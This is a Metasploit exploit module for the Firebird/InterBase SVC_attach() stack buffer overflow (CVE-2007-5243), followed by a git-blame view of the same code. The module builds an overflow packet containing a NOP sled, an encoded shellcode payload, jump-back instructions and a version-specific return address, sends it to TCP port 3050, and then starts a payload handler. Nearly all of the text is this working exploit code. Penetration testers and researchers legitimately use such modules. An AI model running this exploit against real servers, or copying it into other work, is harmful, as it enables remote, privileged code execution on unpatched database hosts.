metasploit-framework/modules/exploits/windows/misc/fb_svc_attach.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::BruteTargets

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'Firebird Relational Database SVC_attach() Buffer Overflow',
			'Description'	=> %q{
				This module exploits a stack buffer overflow in Borland InterBase
				by sending a specially crafted service attach request.
			},
			'Author'	=>
				[
					'Ramon de C Valle',
					'Adriano Lima <adriano[at]risesecurity.org>',
				],
			'Arch'		=> ARCH_X86,
			'Platform'	=> 'win',
			'References'	=>
				[
					[ 'CVE', '2007-5243' ],
					[ 'OSVDB', '38605' ],
					[ 'BID', '25917' ],
					[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
				],
			'Privileged'	=> true,
			'License'	=> MSF_LICENSE,
			'Payload'	=>
				{
					'Space' => 256,
					'BadChars' => "\x00\x2f\x3a\x40\x5c",
					'StackAdjustment' => -3500,
				},
			'Targets'	=>
				[
					[ 'Brute Force', { } ],
					# 0x0040230b pop ebp; pop ebx; ret
					[
						'Firebird WI-V1.5.3.4870 WI-V1.5.4.4910',
						{ 'Length' => [ 308 ], 'Ret' => 0x0040230b }
					],
					# Debug
					[
						'Debug',
						{ 'Length' => [ 308 ], 'Ret' => 0xaabbccdd }
					],
				],
			'DefaultTarget'	=> 1,
			'DisclosureDate'  => 'Oct 03 2007'
		))

		register_options(
			[
				Opt::RPORT(3050)
			], self.class)
	end

	def exploit_target(target)

		target['Length'].each do |length|

			connect

			# Attach database
			op_attach = 19

			# Create database
			op_create = 20

			# Service attach
			op_service_attach = 82

			remainder = length.remainder(4)
			padding = 0

			if remainder > 0
				padding = (4 - remainder)
			end

			buf = ''

			# Operation/packet type
			buf << [op_service_attach].pack('N')

			# Id
			buf << [0].pack('N')

			# Length
			buf << [length].pack('N')

			# Nop block
			buf << make_nops(length - payload.encoded.length - 13)

			# Payload
			buf << payload.encoded

			# Jump back into the nop block
			buf << "\xe9" + [-260].pack('V')

			# Jump back
			buf << "\xeb" + [-7].pack('c')

			# Random alpha data
			buf << rand_text_alpha(2)

			# Target
			buf << [target.ret].pack('V')

			# Padding
			buf << "\x00" * padding

			# Database parameter block

			# Length
			buf << [1024].pack('N')

			# Random alpha data
			buf << rand_text_alpha(1024)

			sock.put(buf)

			#select(nil,nil,nil,4)

			handler

		end

	end

end
Added InterBase/Firebird stuff. git-svn-id: file:///home/svn/framework3/trunk@5136 4d416f70-5f16-0410-b530-b9f4589650da 2007-10-04 03:03:13 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Added InterBase/Firebird stuff. git-svn-id: file:///home/svn/framework3/trunk@5136 4d416f70-5f16-0410-b530-b9f4589650da 2007-10-04 03:03:13 +00:00			`##`

			`require 'msf/core'`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
Added InterBase/Firebird stuff. git-svn-id: file:///home/svn/framework3/trunk@5136 4d416f70-5f16-0410-b530-b9f4589650da 2007-10-04 03:03:13 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::BruteTargets`
Added InterBase/Firebird stuff. git-svn-id: file:///home/svn/framework3/trunk@5136 4d416f70-5f16-0410-b530-b9f4589650da 2007-10-04 03:03:13 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Firebird Relational Database SVC_attach() Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! git-svn-id: file:///home/svn/framework3/trunk@9262 4d416f70-5f16-0410-b530-b9f4589650da 2010-05-09 17:45:00 +00:00			`This module exploits a stack buffer overflow in Borland InterBase`
Added InterBase/Firebird stuff. git-svn-id: file:///home/svn/framework3/trunk@5136 4d416f70-5f16-0410-b530-b9f4589650da 2007-10-04 03:03:13 +00:00			`by sending a specially crafted service attach request.`
			`},`
			`'Author' =>`
			`[`
Update author information 2012-09-19 14:55:30 +00:00			`'Ramon de C Valle',`
Fix: whitespaces, svn propset, author e-mail format git-svn-id: file:///home/svn/framework3/trunk@14175 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-06 22:02:26 +00:00			`'Adriano Lima <adriano[at]risesecurity.org>',`
Added InterBase/Firebird stuff. git-svn-id: file:///home/svn/framework3/trunk@5136 4d416f70-5f16-0410-b530-b9f4589650da 2007-10-04 03:03:13 +00:00			`],`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'win',`
			`'References' =>`
			`[`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`[ 'CVE', '2007-5243' ],`
			`[ 'OSVDB', '38605' ],`
			`[ 'BID', '25917' ],`
			`[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],`
			`],`
Added InterBase/Firebird stuff. git-svn-id: file:///home/svn/framework3/trunk@5136 4d416f70-5f16-0410-b530-b9f4589650da 2007-10-04 03:03:13 +00:00			`'Privileged' => true,`
			`'License' => MSF_LICENSE,`
			`'Payload' =>`
			`{`
			`'Space' => 256,`
			`'BadChars' => "\x00\x2f\x3a\x40\x5c",`
			`'StackAdjustment' => -3500,`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Brute Force', { } ],`
			`# 0x0040230b pop ebp; pop ebx; ret`
			`[`
			`'Firebird WI-V1.5.3.4870 WI-V1.5.4.4910',`
			`{ 'Length' => [ 308 ], 'Ret' => 0x0040230b }`
			`],`
			`# Debug`
			`[`
			`'Debug',`
			`{ 'Length' => [ 308 ], 'Ret' => 0xaabbccdd }`
			`],`
			`],`
add lots of disclosure dates from OSVDB git-svn-id: file:///home/svn/framework3/trunk@9669 4d416f70-5f16-0410-b530-b9f4589650da 2010-07-03 03:13:45 +00:00			`'DefaultTarget' => 1,`
			`'DisclosureDate' => 'Oct 03 2007'`
Added InterBase/Firebird stuff. git-svn-id: file:///home/svn/framework3/trunk@5136 4d416f70-5f16-0410-b530-b9f4589650da 2007-10-04 03:03:13 +00:00			`))`

			`register_options(`
			`[`
			`Opt::RPORT(3050)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`], self.class)`
Added InterBase/Firebird stuff. git-svn-id: file:///home/svn/framework3/trunk@5136 4d416f70-5f16-0410-b530-b9f4589650da 2007-10-04 03:03:13 +00:00			`end`

			`def exploit_target(target)`

			`target['Length'].each do \|length\|`

			`connect`

			`# Attach database`
			`op_attach = 19`

			`# Create database`
			`op_create = 20`

			`# Service attach`
			`op_service_attach = 82`

			`remainder = length.remainder(4)`
			`padding = 0`

			`if remainder > 0`
			`padding = (4 - remainder)`
			`end`

			`buf = ''`

			`# Operation/packet type`
			`buf << [op_service_attach].pack('N')`

			`# Id`
			`buf << [0].pack('N')`

			`# Length`
			`buf << [length].pack('N')`

			`# Nop block`
			`buf << make_nops(length - payload.encoded.length - 13)`

			`# Payload`
			`buf << payload.encoded`

			`# Jump back into the nop block`
			`buf << "\xe9" + [-260].pack('V')`

			`# Jump back`
			`buf << "\xeb" + [-7].pack('c')`

			`# Random alpha data`
			`buf << rand_text_alpha(2)`

			`# Target`
			`buf << [target.ret].pack('V')`

			`# Padding`
			`buf << "\x00" * padding`

			`# Database parameter block`

			`# Length`
			`buf << [1024].pack('N')`

			`# Random alpha data`
			`buf << rand_text_alpha(1024)`

			`sock.put(buf)`

Fixes #2134. Subs select for sleep in exploit modules. git-svn-id: file:///home/svn/framework3/trunk@9583 4d416f70-5f16-0410-b530-b9f4589650da 2010-06-22 19:11:05 +00:00			`#select(nil,nil,nil,4)`
Added InterBase/Firebird stuff. git-svn-id: file:///home/svn/framework3/trunk@5136 4d416f70-5f16-0410-b530-b9f4589650da 2007-10-04 03:03:13 +00:00
			`handler`

			`end`

			`end`

Massive OSVDB reference update from Steve Tornio. git-svn-id: file:///home/svn/framework3/trunk@6629 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-07 20:20:42 +00:00			`end`